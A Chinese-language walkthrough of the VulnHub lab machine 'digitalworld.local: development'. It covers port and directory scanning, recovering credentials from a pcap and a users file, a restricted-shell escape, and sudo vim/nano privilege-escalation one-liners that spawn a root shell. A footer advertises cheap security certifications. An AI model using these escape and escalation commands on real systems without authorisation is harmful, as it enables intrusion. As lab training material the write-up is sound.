https://www.vulnhub.com/entry/digitalworldlocal-development,280/
nmap 详细扫一下端口开放情况

访问8080端口,发现IIS版本是6.0

翻译告诉我们可以访问这个界面查看更多信息

这里发现一个目录

Patrick,Intern作为可能的用户

查看源码发现了一个test.pcap流量包

使用大鲨鱼打开,找到了一个get请求并且是php文件

尝试访问,告诉我们没有要处理的事务

来到这个界面,四处点点

有个登录框

继续找,发现了一个密码

再继续对这个目录进行扫描
gobuster dir -u http://10.10.10.130:8080/developmentsecretpage/ -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-2.3-big.txt -x html,txt,php,js

发现一个version.txt,里面有一个slog_users.txt提示
http://10.10.10.130:8080/developmentsecretpage/version.txt

来访问

解密结果
intern:12345678900987654321
patrick:P@ssw0rd25
qiu:qiu
只有第一个用户能ssh登录
echo os.system('/bin/bash')

这个用户有点特殊,它能本地切换,但是ssh连接不了

上FeatherScan进行提权信息收集,发现可以使用nano和vim进行提权

依次输入上面的命令提权成功!

同样的也可以使用vim进行提权
sudo vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# 或者
sudo vim -c ':!/bin/sh'

全网低价证书找我 + baibaixiaoyu2024
包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,oscp,osep等等
往期推荐
本站小部分内容转载于互联网,如有侵权还请联系
THE END
















暂无评论内容